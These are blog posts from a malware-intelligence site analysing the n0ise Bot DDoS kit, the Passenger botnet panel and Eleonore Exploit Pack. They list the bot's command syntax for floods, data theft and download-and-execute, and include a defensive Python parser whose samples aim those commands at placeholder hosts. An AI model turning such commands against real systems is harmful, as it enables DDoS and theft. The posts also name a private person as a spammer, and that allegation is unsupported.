MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

29.6.10

DDoS attacks are not a trivial problem, and various web applications of this kind, such as BlackEnergy, have been used to run massive attack campaigns; in the case of BlackEnergy, during the conflict between Russia and Georgia.

The impact of such threats is extremely serious, and under this banner the business that is channelled through crimeware enters the circuit with a web application called n0ise Bot, of German origin, which, although it has not yet made much of an impact on the criminal ecosystem, has been on the black market for some time.

n0ise Bot is designed exclusively to recruit zombies and execute Distributed Denial of Service attacks.

It has a minimalist design, but it offers the information needed to manage the zombies that will be used as the means of carrying out DDoS attacks.

The commands available through the basic configuration of this crimeware are:

Syn-Flood - synflood*Host*Port*Threads*Sockets

HTTP-Flood - httpflood*Host*Threads

UDP-Flood - udpflood*Host*Port*Threads*Sockets*Packetsize

ICMP-Flood - icmpflood*Host*Port*Threads*Sockets*Packetsize

Multi Stealer - steal*Link to Uploadscript

Download and Execute - downandexe*LinkToFile

Visit Page - visit*Link

Bot Update - update*LinkToNewBot

Remove Bot - remove*Name
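As an added example (not code from this page, nor from the author of n0ise), the following Python parser turns command strings in the format listed above, as an analyst might recover them from a sandbox run or a network capture, into structured records that can be classified and mined for indicators. The '*' delimiter and the argument names come from the command list; the sample strings, the category labels, the numeric checks on port/thread/socket/packet-size fields and the helper names are assumptions of this example.

```python
"""Parse n0ise Bot style C&C command strings into structured records.

Added example for analysts: given command strings recovered from a sandbox
run or a network capture, classify them so they can be turned into
indicators or alert fields. The command grammar (name*arg*arg...) and the
argument names come from the bot's command list; everything else (sample
strings, category labels, numeric checks) is constructed for this example.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Optional

# Command name -> ordered argument names, as listed in the bot's basic
# configuration. Order matters: positions are separated by '*'.
COMMAND_SCHEMA: Dict[str, List[str]] = {
    "synflood":   ["host", "port", "threads", "sockets"],
    "httpflood":  ["host", "threads"],
    "udpflood":   ["host", "port", "threads", "sockets", "packetsize"],
    "icmpflood":  ["host", "port", "threads", "sockets", "packetsize"],
    "steal":      ["upload_script"],
    "downandexe": ["file_url"],
    "visit":      ["url"],
    "update":     ["new_bot_url"],
    "remove":     ["name"],
}

# Coarse categories an analyst would alert on (labels are our own, not the bot's).
CATEGORY: Dict[str, str] = {
    "synflood": "ddos", "httpflood": "ddos", "udpflood": "ddos", "icmpflood": "ddos",
    "steal": "credential_theft", "downandexe": "dropper", "visit": "traffic",
    "update": "self_update", "remove": "uninstall",
}

# Fields we expect to be plain integers (assumption based on their names).
NUMERIC_FIELDS = {"port", "threads", "sockets", "packetsize"}


@dataclass
class ParsedCommand:
    raw: str
    name: str
    category: str
    args: Dict[str, str] = field(default_factory=dict)
    error: Optional[str] = None

    @property
    def ok(self) -> bool:
        return self.error is None


def parse_command(line: str) -> ParsedCommand:
    """Split one command on '*' and validate it against COMMAND_SCHEMA."""
    raw = line.strip()
    parts = raw.split("*")
    name = parts[0].lower()
    if name not in COMMAND_SCHEMA:
        return ParsedCommand(raw, name, "unknown", error="unknown command")
    expected = COMMAND_SCHEMA[name]
    values = parts[1:]
    if len(values) != len(expected):
        return ParsedCommand(raw, name, CATEGORY[name],
                             error=f"expected {len(expected)} args, got {len(values)}")
    args = dict(zip(expected, values))
    for key in expected:
        if key in NUMERIC_FIELDS and not args[key].isdigit():
            return ParsedCommand(raw, name, CATEGORY[name], args,
                                 error=f"{key} is not numeric: {args[key]!r}")
    return ParsedCommand(raw, name, CATEGORY[name], args)


def extract_indicators(commands: Iterable[ParsedCommand]) -> Dict[str, List[str]]:
    """Collect hosts and URLs from well-formed commands, grouped by category."""
    out: Dict[str, List[str]] = {}
    for cmd in commands:
        if not cmd.ok:
            continue
        for key in ("host", "upload_script", "file_url", "url", "new_bot_url"):
            if key in cmd.args:
                out.setdefault(cmd.category, []).append(cmd.args[key])
    return out


# Constructed sample input, not captured traffic; hosts and URLs use the
# documentation address range and .invalid domains.
SAMPLE_COMMANDS = [
    "synflood*192.0.2.10*80*50*200",
    "udpflood*192.0.2.10*53*20*100*1024",
    "downandexe*http://example.invalid/payload.exe",
    "steal*http://example.invalid/up.php",
    "httpflood*192.0.2.10",                # missing threads -> rejected
    "udpflood*192.0.2.10*53*x*100*1024",   # non-numeric threads -> rejected
    "selfdestruct*now",                    # not in the command set -> unknown
]

if __name__ == "__main__":
    parsed = [parse_command(c) for c in SAMPLE_COMMANDS]
    for p in parsed:
        status = "OK " if p.ok else "ERR"
        print(f"{status} {p.name:<11} {p.category:<17} {p.args if p.ok else p.error}")
    print(extract_indicators(parsed))
```

Malformed commands are kept in the output with an error rather than silently dropped, since a command that does not fit the known grammar is itself worth a second look (a newer bot version, or a different family reusing the same panel style).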

The business strategy employed to sell the crimeware adds to the tendency to legitimise its existence through advertising displayed on the crimeware's "official" website, called Coding-Revolutions, which also sells other applications for handling malicious code for "secure communications" under the slogan "Willkommen im Shop von neuen n0ise Malware!" (something like "Welcome to the new n0ise malware store").

As shown in the image, n0ise Bot costs € 50 (the binary only, without the builder) or € 250 (lifetime binary, including future upgrades); transactions are made through the paysafecard service, an online payment system that leaves no trace of those involved in the transactions.

However, since May 2010 the developer has released a second version (2.1), in which the cost of the binary remains € 50 but the lifetime price has dropped to € 200, perhaps as a consequence of its lack of impact among computer criminals.

26.6.10

If, 5/6 years ago, when botnets were massively operated through IRC channels, we talked about centralized control and management of botnets (C&C) via HTTP, it was seen as a trend.

After the first few kits appeared, demand began to be high but supply was poor. However, despite several years having passed, these kits continue to set trends in crimeware today, and demand remains high, with the difference that supply is now directly proportional to it.

In this scenario, every day we witness the appearance of some new web application that adds to the supply, designed exclusively to feed that demand and to facilitate the management and intelligence of the offenders' "assets" (zombies). Another concrete example of this trend is Passenger Admin Panel.

As can be seen in the images, Passenger is of Russian origin and is apparently a private version, or one built on demand, since there are no references to its development.

It has only three options. The first is the statistics panel, which centralises information on the number of zombies (in this case 16.845), the number of active zombies (582; this figure is refreshed every 60 minutes), the number of zombies recruited per day (36) and the number of victims during the past 24 hours (7.349), among other data.

The statistics go on to show data on the bot versions, the number of zombies recruited by each affiliate ID together with the number of victims each has (in this case there are two affiliates, with 16.842 and 3 zombies respectively), the status of a module curiously called Putty Grabber, with its records, and the number of operating systems involved.

The operating systems that make up the range of victims of this botnet are:

Microsoft Windows 2000 Service Pack 3

Microsoft Windows Server 2003

Microsoft Windows Server 2003 Service Pack 1 and 2

Microsoft Windows Server 2003 R2 Service Pack 1 and 2

Microsoft Windows XP

Microsoft Windows XP Service Pack 1, 2 and 3

Windows XP by Rushen 10.5 Minimal Service Pack 3

Windows Vista (TM) Business

Windows Vista (TM) Business Service Pack 1 and 2

Windows Vista (TM) Home Basic

Windows Vista (TM) Home Basic Service Pack 1 and 2

Windows Vista (TM) Home Premium

Windows Vista (TM) Home Premium Service Pack 1 and 2

Windows Vista (TM) Ultimate Service Pack 1 and 2

Windows Server (R) 2008 Standard Service Pack 2

Passenger can set the task of updating the bot through a previously assigned URL that points to a file called u.php. However, as mentioned above, the most interesting feature for the offender is provided by the Putty Grabber module, which displays specific information and stores sensitive data for each compromised computer.

Undoubtedly, crimeware is a very serious problem that operates globally and on a large scale, and the constant emergence of alternatives such as the one described here is further evidence of this.

23.6.10

Undoubtedly, crimeware of the exploit pack and malware kit type, whether general purpose, such as ZeuS, or special purpose, such as RussKill, has become the crème de la crème of computer crime and synonymous with ease for cybercriminals.

On that basis, one of the fastest-growing crimeware kits of the past six months is Eleonore Exploit Pack. It is currently on the lips of many would-be cybercriminals who use it, and of security professionals who have noticed its impact within the crime scene because of its steadily growing recruitment of followers, which justifies this investigation.

Earlier this year we reported how the developer of this application was releasing different versions of the crimeware, and from the final version at that time (1.3.2) to the current one (1.4.1), little has changed.

The truth is that, as shown in the image, attack coverage includes a considerable number of operating systems, an aspect that has also become a trend for some exploit packs, as in the case of Siberia Exploit Pack, which even shares a similar taste in its design.

But let's again review the chronology of the appearance of the different versions:

The base of this botnet is hosted in the U.S., with the provider Secured Private Network on ASN22298, which also hosts rogue-type malware, FakeAV, some other trojans, variants of ZeuS and even some Koobface families, and is maintained by the business services of QuadraNet, led by an Israeli spammer named Ilan Mishan, also well known in the underground for providing the resources needed to host spam, scam, phishing and pornography activities, including through other companies such as OC-3 Networks and PacificRack, linked under QuadraNet.

Despite having its C&C in the U.S., the highest rate of activity is in Eastern Europe, specifically in Ukraine, where the largest number of computers whose security has been breached by one of the many exploits distributed by Eleonore Exploit Pack are located.

On the other hand, it is interesting to know the web pages through which victims are referred to Eleonore's pre-compiled exploits. The lists are usually very long and quite varied in subject matter, which typically characterises pages with sexually explicit content, the spread of FakeAV, online casinos and pharmacies, among others.

Also, another element closely linked to the business side of these criminal activities: affiliate programs. In this case, one is promoted for the purchase of web traffic, where the core of the business is to make money through advertising injected into web pages and displayed in popup windows.